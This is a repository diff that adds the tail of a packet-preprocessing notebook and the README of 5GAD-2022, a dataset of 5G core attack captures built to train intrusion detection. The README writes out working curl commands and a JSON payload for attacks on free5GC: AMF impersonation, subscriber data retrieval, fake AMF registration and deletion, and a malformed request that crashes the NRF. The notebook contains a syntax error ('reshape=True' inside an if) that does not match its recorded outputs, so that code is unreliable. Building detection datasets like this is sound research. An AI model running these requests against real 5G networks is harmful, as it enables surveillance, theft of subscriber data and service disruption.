797	+	"del mixed_labels\n",
798	+	"print('Packets in malicious: ',len(malicious))\n",
799	+	"print('Packets in mixed: ',len(mixed))\n",
800	+	"print('Mixed set is of the expected size: ',len(malicious)*2==len(mixed))"
801	+	]
802	+	},
803	+	{
804	+	"cell_type": "markdown",
805	+	"metadata": {},
806	+	"source": [
807	+	"## Normalize the packet lengths and reshape each packet's string of bytes to an array of bytes\n",
808	+	"- The length of the payloads can vary widely, from a few bytes to several thousand bytes. I checked a few dozen attack packets, and those usually weren't much longer (+/- 20%) than 1000 bytes. We have to use a square number for the length because our FPGAs don't like performing convolutions unless the inputs are square, i.e. 10x10, 25x25, 32x32, etc. If this is not desired, set the `reshape` argument to `False`\n",
809	+	" - to normalize the payload length, append zeros to the ends of packets shorter than the desired size and truncate longer packets to the desired size\n",
810	+	" - to convert from byte string to byte array, we use the numpy function `frombuffer`"
811	+	]
812	+	},
813	+	{
814	+	"cell_type": "markdown",
815	+	"metadata": {},
816	+	"source": [
817	+	"#### Declare the desired, normalized size for the packets:"
818	+	]
819	+	},
820	+	{
821	+	"cell_type": "code",
822	+	"execution_count": 12,
823	+	"metadata": {},
824	+	"outputs": [],
825	+	"source": [
826	+	"max_packet_length = 1024"
827	+	]
828	+	},
829	+	{
830	+	"cell_type": "code",
831	+	"execution_count": 13,
832	+	"metadata": {},
833	+	"outputs": [],
834	+	"source": [
835	+	"def ReshapePackets(dataFrame, saveToFilename, max_packet_length, reshape=True):\n",
836	+	" '''Converts from byte strings in a DataFrame to a numpy array of bytes'''\n",
837	+	" array = np.array(dataFrame['raw'])\n",
838	+	" array = np.ascontiguousarray(array)\n",
839	+	" payloads = []\n",
840	+	" array.shape\n",
841	+	" for i in range(array.shape[0]):\n",
842	+	"# print(array[i])\n",
843	+	" # Standardize the length of the strings:\n",
844	+	" payloadStr = array[i].split('\\'')[1]\n",
845	+	" payloadStr = payloadStr.ljust(max_packet_length+2, u'0')\n",
846	+	" payloadStr = payloadStr[0:max_packet_length]\n",
847	+	" array[i] = payloadStr.encode('utf8')\n",
848	+	" # Convert to array:\n",
849	+	" array[i] = np.frombuffer(array[i],dtype=np.uint8,count=max_packet_length)\n",
850	+	" if(reshape=True):\n",
851	+	" payloads.append(np.reshape(array[i],(array[i].shape[0],1,1)))\n",
852	+	" else:\n",
853	+	" payloads.append(array[i])\n",
854	+	" payloads = np.array(payloads)\n",
855	+	" print('New data shape: ',payloads.shape)\n",
856	+	" np.save(saveToFilename,payloads)"
857	+	]
858	+	},
859	+	{
860	+	"cell_type": "markdown",
861	+	"metadata": {},
862	+	"source": [
863	+	"### Normalize and reshape the mixed data\n",
864	+	"Also delete it to free memory"
865	+	]
866	+	},
867	+	{
868	+	"cell_type": "code",
869	+	"execution_count": 14,
870	+	"metadata": {},
871	+	"outputs": [
872	+	{
873	+	"name": "stdout",
874	+	"output_type": "stream",
875	+	"text": [
876	+	"New data shape: (48349, 1024, 1, 1)\n"
877	+	]
878	+	}
879	+	],
880	+	"source": [
881	+	"ReshapePackets(mixed,f'{processedPath}mixed.npy',max_packet_length)\n",
882	+	"del mixed"
883	+	]
884	+	},
885	+	{
886	+	"cell_type": "markdown",
887	+	"metadata": {},
888	+	"source": [
889	+	"### Create a 50/50 split of the two types of normal data:\n",
890	+	"As before, delete the variables after we're done with them"
891	+	]
892	+	},
893	+	{
894	+	"cell_type": "code",
895	+	"execution_count": 24,
896	+	"metadata": {},
897	+	"outputs": [
898	+	{
899	+	"name": "stdout",
900	+	"output_type": "stream",
901	+	"text": [
902	+	"New data shape: (9339618, 1024, 1, 1)\n",
903	+	"New data shape: (24851445, 1024, 1, 1)\n",
904	+	"New data shape: (18679236, 1024, 1, 1)\n"
905	+	]
906	+	}
907	+	],
908	+	"source": [
909	+	"totalNormal = pd.concat([normal.sample(frac=1,random_state=2022),\n",
910	+	" normal2UE.sample(frac=1,random_state=100)[0:len(normal)]\n",
911	+	" ])\n",
912	+	"totalNormal = totalNormal.sample(frac=1,random_state=2022)\n",
913	+	"ReshapePackets(normal,f'{processedPath}normal.npy',max_packet_length)\n",
914	+	"del normal\n",
915	+	"ReshapePackets(normal2UE,f'{processedPath}normal2UE.npy',max_packet_length)\n",
916	+	"del normal2UE\n",
917	+	"ReshapePackets(totalNormal,f'{processedPath}total_normal.npy',max_packet_length)\n",
918	+	"del totalNormal"
919	+	]
920	+	},
921	+	{
922	+	"cell_type": "code",
923	+	"execution_count": 25,
924	+	"metadata": {},
925	+	"outputs": [
926	+	{
927	+	"name": "stdout",
928	+	"output_type": "stream",
929	+	"text": [
930	+	"[[[52]]\n",
931	+	"\n",
932	+	" [[97]]\n",
933	+	"\n",
934	+	" [[97]]\n",
935	+	"\n",
936	+	" ...\n",
937	+	"\n",
938	+	" [[48]]\n",
939	+	"\n",
940	+	" [[48]]\n",
941	+	"\n",
942	+	" [[48]]]\n",
943	+	"['normal' 'normal' 'normal' 'attack' 'normal']\n"
944	+	]
945	+	}
946	+	],
947	+	"source": [
948	+	"mixed = np.load(f'{processedPath}mixed.npy',allow_pickle=True)\n",
949	+	"labels = np.load(f'{processedPath}mixed_labels.npy',allow_pickle=True)\n",
950	+	"print(mixed[0:5][1])\n",
951	+	"print(labels[0:5])"
952	+	]
953	+	},
954	+	{
955	+	"cell_type": "code",
956	+	"execution_count": null,
957	+	"metadata": {},
958	+	"outputs": [],
959	+	"source": []
960	+	}
961	+	],
962	+	"metadata": {
963	+	"kernelspec": {
964	+	"display_name": "Python 3 (ipykernel)",
965	+	"language": "python",
966	+	"name": "python3"
967	+	},
968	+	"language_info": {
969	+	"codemirror_mode": {
970	+	"name": "ipython",
971	+	"version": 3
972	+	},
973	+	"file_extension": ".py",
974	+	"mimetype": "text/x-python",
975	+	"name": "python",
976	+	"nbconvert_exporter": "python",
977	+	"pygments_lexer": "ipython3",
978	+	"version": "3.9.13"
979	+	}
980	+	},
981	+	"nbformat": 4,
982	+	"nbformat_minor": 4
983	+	}
984	+

■ ■ ■ ■ ■ ■

README.md

1	+	# 5GAD-2022 5G attack detection dataset
2	+
3	+	> This dataset was created by Cooper Coldwell, Denver Conger, Edward Goodell, Brendan Jacobson, Bryton Petersen, Damon Spencer, Matthew Anderson, and Matthew Sgambati and introduced in *Machine Learning 5G Attack Detection in Programmable Logic*.
4	+
5	+	This dataset contains two types of intercepted network packets: "normal" network traffic packets (i.e. a variety of non-malicious traffic types) and attacks against a 5G Core implemented with free5GC. The captures were collected using tshark or Wireshark on 4 different network interfaces within the 5G core. Those interfaces and where they sit within the system are outlined in the 5GNetworkDiagram figure. Files that start with "allcap" contain packets that were recorded on all four interfaces simultaneously; other \*.pcapng files represent the same data that has been broken out into one of the four interfaces.
6	+
7	+	![5GNetworkDiagram.png](attachment:5GNetworkDiagram.png)
8	+
9	+	# Citation and Contact
10	+	If you use our dataset, please cite it:
11	+	```
12	+	@dataset{5gad,
13	+	title={5GAD-2022},
14	+	author={Coldwell, Conger, Goodell, Jacobson, Petersen, Spencer, Anderson, Sgambati},
15	+	doi={},
16	+	journal={},
17	+	year={2022}
18	+	}
19	+	```
20	+	If you find our paper useful, please cite it:
21	+	```
22	+	@article{5g_ml_fpga,
23	+	title={Machine Learning 5G Attack Detection in Programmable Logic},
24	+	author={Coldwell, Conger, Goodell, Jacobson, Petersen, Spencer, Anderson, Sgambati},
25	+	doi={},
26	+	journal={},
27	+	year={2022}
28	+	}
29	+	```
30	+
31	+
32	+	NOTE: The normal sets do not contain explicit breakdowns for each interface to reduce the download size. The individual interfaces can be separated from the allcap file in Wireshark as follows:
33	+	1. Add a new column to Wireshark via Edit->Preferences->Appearance->Columns and then click on '+' to add a new column.
34	+	2. Set the column 'type' as 'Custom' and the field as 'frame.interface_name'.
35	+	3. To select only a particular interface, return to the main Capture page.
36	+	4. Apply the filter 'frame.interface_name==' followed by the desired interface.
37	+	5. Export the separated packets via File->Export Specified Packets
38	+
39	+	***
40	+
41	+	# Normal Data and Descriptions
42	+	### Normal-1UE
43	+	This dataset consists of normal internet traffic recorded on the same interfaces as the attack dataset. Specifically, it contains network traffic simulated on a single UE with various automated tasks including streaming YouTube videos, accessing 500 popular websites, downloading files via FTP, mounting a SAMBA share and downloading files from it, and having a conference call via Microsoft Teams.
44	+
45	+	### Normal-2UE
46	+	The same traffic types as in Normal-1UE were used for Normal-2UE, except this time, the traffic generation was divided between 2 UEs.
47	+
48	+	All of the packets are contained in the "total_allcap\.pcapng;" to reduce the number of processing difficulties, we split the "total_allcap\.pcapng" file into a sequential series of files. The order of these files is given by the number preceding the file extension. For example, "allcap_20220613162057_00010.pcapng" is the 10th file in the sequence.
49	+	***
50	+
51	+	# Attack Data and Descriptions
52	+	There are 10 attacks that we ran on our 5G test bench, most of which rely on REST API calls to different parts of the core.
53	+
54	+	The Attacks directory contains each of the attacks, each divided into its own subdirectory. Within each attack is a \.pcapng* file beginning with "Attacks_" that contains only the attack packets present in the "allcap" file. Files not beginning with "Attacks_" may contain some benign, incidental traffic.
55	+
56	+	## Surveillance Attacks
57	+
58	+	### AMFLookingForUDM
59	+	This attack is performed by requesting information about the unified data management (UDM) network function while impersonating an access and mobility management function (AMF). Internally this attack appears to be a benign system request and exploits the fact that the network repository function (NRF) does not check if the source of the request is actually an AMF. This attack is performed with the following Linux command:
60	+	```
61	+	curl "http://127.0.0.10:8000/nnrf-disc/v1/nf-instances?requester-nf-type=AMF\&target-nf-type=UDM"
62	+	```
63	+	where 127.0.0.10 is the IP address of the NRF.
64	+
65	+	### GetAllNFs
66	+	This attack is performed identically to AMFLookingForUDM except the `target-nf-type` is not specified. This results in the NRF returning all network functions (NF) to the requester.
67	+
68	+	### GetUserData
69	+	This attack requests information from the UDM regarding a user with `subscriberID=0000000003`. This attack was performed with:
70	+	```
71	+	curl "http://127.0.0.3:8000/nudm-dm/v1/imsi-20893\$\{subscriberID\}/am-data?plmn-id=\%7B\%22mcc\%22\%3A\%22208\%22\%2C\%22mnc\%22\%3A\%2293\%22\%7D"
72	+	```
73	+
74	+	### randomDataDump
75	+	This attack exploits a lack of input validation in free5GC and sets the `requester-nf-type` to a random string when making an `nf-instances` request to the NRF. The NRF will still respond with all of the NFs. This attack is executed with the following Linux command:
76	+	```
77	+	curl "http://127.0.0.10:8000/nnrf-disc/v1/nf-instances?requester-nf-type=\$randomString\&target-nf-type="
78	+	```
79	+
80	+	### automatedRedirectWithTimer
81	+	This attack is from Positive Technologies' report 5G Standalone core security research section 4.3. In essence, it listens to network traffic while the UE is connecting. The attack code listens for a packet forwarding control protocol (PFCP) session establishment request, then checks if the UE address is in a list of victim addresses. If the UE is a victim then the attack records session information that it uses to redirect traffic from the UE. This is achieved by sending a PFCP session modification request to the user plane function (UPF) with the discovered session ID and forwarding action rule ID (FARID). The attack will send two such modification requests, wait 5 seconds, send two more modification requests to return the UE to its normal path, wait 5 more seconds, and then repeat.
82	+
83	+	## Network Reconfiguration Attacks
84	+	### FakeAMFInsert
85	+	This attack registers a fake AMF with the NRF. This is achieved by running the `curl` command to `PUT` a JSON object to the NRF. In the environment where this attack was run there is no check on authority to prevent the attacker from registering a fake AMF. The FakeAMFDelete attack is subsequently run to remove the fake AMF. The instance-ID is required to be a version 4 universally unique identifier(UUID), however free5GC does not check the instance-ID or other details about the AMF before adding it to the core. This includes whether or not the instance-id is a properly formatted UUID, which consists of hexadecimal values in a string. A few 1's in the attack's UUID string were replaced with l's while writing the attack code, so the string was not correctly formatted as hexadecimal. The instance-ID was therefore an invalid UUID, but the instance-ID was accepted by free5GC regardless. The full curl command with its JSON code is below.
86	+
87	+	```
88	+	curl -X PUT -H "Content-Type: application/json" -d
89	+	"{
90	+	"nfInstanceId":"b01dface-bead-cafe-bade-cabledfabled",
91	+	"nfType":"AMF",
92	+	"nfStatus":"REGISTERED",
93	+	"plmnList":[
94	+	{
95	+	"mcc":"208",
96	+	"mnc":"93"
97	+	},
98	+	{
99	+	"mcc":"001",
100	+	"mnc":"01"
101	+	}
102	+	],
103	+	"sNssais":[
104	+	{
105	+	"sst":1,
106	+	"sd":"010203"
107	+	},
108	+	{
109	+	"sst":1,
110	+	"sd":"112233"
111	+	}
112	+	],
113	+	"ipv4Addresses":[
114	+	"127.0.0.18"
115	+	],
116	+	"amfInfo":{
117	+	"amfSetId":"3f8",
118	+	"amfRegionId":"ca",
119	+	"guamiList":[
120	+	{
121	+	"plmnId":{
122	+	"mcc":"208",
123	+	"mnc":"93"
124	+	},
125	+	"amfId":"cafe00"
126	+	},
127	+	{
128	+	"plmnId":{
129	+	"mcc":"208",
130	+	"mnc":"93"
131	+	},
132	+	"amfId":"cafe01"
133	+	}
134	+	],
135	+	"taiList":[
136	+	{
137	+	"plmnId":{
138	+	"mcc":"208",
139	+	"mnc":"93"
140	+	},
141	+	"tac":"000001"
142	+	},
143	+	{
144	+	"plmnId":{
145	+	"mcc":"001",
146	+	"mnc":"01"
147	+	},
148	+	"tac":"000064"
149	+	}
150	+	]
151	+	},
152	+	"nfServices":[
153	+	{
154	+	"serviceInstanceId":"0",
155	+	"serviceName":"namf-comm",
156	+	"versions":[
157	+	{
158	+	"apiVersionInUri":"v1",
159	+	"apiFullVersion":"1.0.0"
160	+	}
161	+	],
162	+	"scheme":"http",
163	+	"nfServiceStatus":"REGISTERED",
164	+	"ipEndPoints":[
165	+	{
166	+	"ipv4Address":"127.0.0.18",
167	+	"transport":"TCP",
168	+	"port":8000
169	+	}
170	+	],
171	+	"apiPrefix":"http://127.0.0.18:8000"
172	+	},
173	+	{
174	+	"serviceInstanceId":"1",
175	+	"serviceName":"namf-evts",
176	+	"versions":[
177	+	{
178	+	"apiVersionInUri":"v1",
179	+	"apiFullVersion":"1.0.0"
180	+	}
181	+	],
182	+	"scheme":"http",
183	+	"nfServiceStatus":"REGISTERED",
184	+	"ipEndPoints":[
185	+	{
186	+	"ipv4Address":"127.0.0.18",
187	+	"transport":"TCP",
188	+	"port":8000
189	+	}
190	+	],
191	+	"apiPrefix":"http://127.0.0.18:8000"
192	+	},
193	+	{
194	+	"serviceInstanceId":"2",
195	+	"serviceName":"namf-mt",
196	+	"versions":[
197	+	{
198	+	"apiVersionInUri":"v1",
199	+	"apiFullVersion":"1.0.0"
200	+	}
201	+	],
202	+	"scheme":"http",
203	+	"nfServiceStatus":"REGISTERED",
204	+	"ipEndPoints":[
205	+	{
206	+	"ipv4Address":"127.0.0.18",
207	+	"transport":"TCP",
208	+	"port":8000
209	+	}
210	+	],
211	+	"apiPrefix":"http://127.0.0.18:8000"
212	+	},
213	+	{
214	+	"serviceInstanceId":"3",
215	+	"serviceName":"namf-loc",
216	+	"versions":[
217	+	{
218	+	"apiVersionInUri":"v1",
219	+	"apiFullVersion":"1.0.0"
220	+	}
221	+	],
222	+	"scheme":"http",
223	+	"nfServiceStatus":"REGISTERED",
224	+	"ipEndPoints":[
225	+	{
226	+	"ipv4Address":"127.0.0.18",
227	+	"transport":"TCP",
228	+	"port":8000
229	+	}
230	+	],
231	+	"apiPrefix":"http://127.0.0.18:8000"
232	+	},
233	+	{
234	+	"serviceInstanceId":"4",
235	+	"serviceName":"namf-oam",
236	+	"versions":[
237	+	{
238	+	"apiVersionInUri":"v1",
239	+	"apiFullVersion":"1.0.0"
240	+	}
241	+	],
242	+	"scheme":"http",
243	+	"nfServiceStatus":"REGISTERED",
244	+	"ipEndPoints":[
245	+	{
246	+	"ipv4Address":"127.0.0.18",
247	+	"transport":"TCP",
248	+	"port":8000
249	+	}
250	+	],
251	+	"apiPrefix":"http://127.0.0.18:8000"
252	+	}
253	+	],
254	+	"defaultNotificationSubscriptions":[
255	+	{
256	+	"notificationType":"N1_MESSAGES",
257	+	"callbackUri":"http://127.0.0.18:8000/namf-callback/v1/n1-message-notify",
258	+	"n1MessageClass":"5GMM"
259	+	}
260	+	]
261	+	}"
262	+
263	+	http://127.0.0.10:8000/nnrf-nfm/v1/nf-instances/b01dface-bead-cafe-bade-cabledfabled
264	+	```
265	+
266	+	### randomAMFInsert
267	+	This attack is the same as "FakeAMFInsert" except the instance ID is a randomly generated UUID.
268	+
269	+	## DOS Attacks
270	+	### CrashNRF
271	+	This attack relies on an exploit in free5GC wherein a malformed request to the network repository function (NRF) will cause it to crash. This attack is run using
272	+	```
273	+	curl "http://127.0.0.10:8000/nnrf-disc/v1/nf-instances?requester-nf-type=\&target-nf-type="
274	+	```
275	+	where 127.0.0.10 is the IP address of the NRF. As of free5GC v3.1.1, this exploit appears to have been patched, as this HTTP `GET` request will no longer result in the failure of the core.
276	+
277	+	### FakeAMFDelete
278	+	This attack is operated in conjunction with FakeAMFInsert with the line
279	+	```
280	+	curl -s -o /dev/null -w "\n\nHTTP Status Code: %{http_code}\n\n" -X DELETE http://127.0.0.10:8000/nnrf-nfm/v1/nf-instances/$fakeAMF
281	+	```
282	+	where `fakeAMF` is the hexadecimal session ID of the false AMF inserted into the system. This attack, coupled with GetAllNFs to find other AMFs, could be exploited to remove legitimate AMFs from the network, disrupting network functionality.
283	+
284	+	### automatedDropWithTimer
285	+	This attack is similar to the "Automatic Redirect with Timer" attack, but alternates between redirecting user traffic and dropping user traffic, effectively disconnecting the user from the data network (DN).
286	+
287	+	<!-- - ### CrashNRF
288	+	This attack relies on an exploit in an older version free5GC where a malformed request to the NRF will cause the NRF to crash. This attack is run using the curl command with the argument "http://127.0.0.10:8000/nnrf-disc/v1/nf-instances?requester-nf-type=&target-nf-type=".
289	+	As of the initial release of this dataset, this exploit has been patched in free5GC, and this http GET request will no longer result in the failure of the core.
290	+
291	+	- ### AMFLookingForUDM
292	+	This is a surveillance attack that requests information about UDMs while impersonating an AMF. This attack can look very similar to a benign system request, however, this takes advantage of the fact that the NRF is not configured to authenticate if the source of the request is actually an AMF. This attack is performed by using curl with the argument "http://127.0.0.10:8000/nnrf-disc/v1/nf-instances?requester-nf-type=AMF&target-nf-type=UDM"
293	+
294	+	- ### FakeAMFInsert and FakeAMFDelete
295	+	This attack tells the NRF that there is a new AMF in the core with the instance id "b01dface-bead-cafe-bade-cabledfabled". This is achieved by running the curl command to PUT a JSON object to the NRF. FakeAMFDelete is run subsequently to remove the fake AMF.
296	+
297	+	- ### RandomAMFInsert
298	+	This is the same as FakeAMFInsert but the instance ID is a randomly generated string.
299	+
300	+	- ### GetAllNFs
301	+	This surveillance attack is identical to AMFLookingForUDM except the target-nf-type is not specified. This results in the NRF returning all NFs to the requester which is a bug in Free5GC.
302	+
303	+	- ### GetUserData
304	+	This attack makes a request to the UDM for information regarding a user with subscriberID=0000000003. This attack is executed using curl with the argument
305	+	"http://127.0.0.3:8000/nudm-sdm/v1/imsi-20893${subscriberID}/am-data?plmn-id=%7B%22mcc%22%3A%22208%22%2C%22mnc%22%3A%2293%22%7D". Note: this expands out to "http://127.0.0.3:8000/nudm-sdm/v1/imsi-20893${subscriberID}/am-data?plmn-id={ mcc : 208 , mnc : 93 }".
306	+
307	+	- ### randomDataDump
308	+	This attack relies on a lack of input sanitization in Free5GC and sets the requester-nf-type to a random string when making an nf-instances request to the NRF. The NRF will still respond with all of the NFs. This attack is executed with curl and the argument "http://127.0.0.10:8000/nnrf-disc/v1/nf-instances?requester-nf-type=$randomString&target-nf-type="
309	+
310	+	- ### automatedDropWithTimer and automatedRedirectWithTimer
311	+	These attacks rely on sniffing the network while the UE is connecting. This means that we started recording packets before the UE was connected. The attack code listens for a PFCP session establishment request and then it checks if the UE address is in a list victim addresses. If the UE is a victim then the attack records session information that it uses to either redirect traffic from the UE or drop packets from the UE. This achieved by sending a PFCP session modification request to the UPF with the session ID and FARID captured during the sniffing phase. The attack will send two such modification requests, wait 5 seconds, send two more modification requests to return the UE to its normal path, wait 5 more seconds and repeat.
312	+	-->
313	+	***
314	+	# Data Preparation
315	+	Included with the dataset are two versions of the file used to process the data for use in training autoencoders on anomaly detection, though the files can be adapted for other purposes as well. The `Data_prep.ipynb` notebook walks through the data preparation in detail, while the `Data_prep.py` file was derived from the notebook to be (hopefully) more cut-down and lightweight.
316	+
317	+	Without modification, the data preparation files require at least 96 GB of memory and several hours to process the data. This issue can likely be overcome by changing the instances of the `sniff(...)` function to process each packet without storing packets sequentially in memory.
318	+
319	+	Special thanks to Christopher Becker and Jesse Cooper
320	+
321	+	This the end of the description.
322	+
323	+

Add files via upload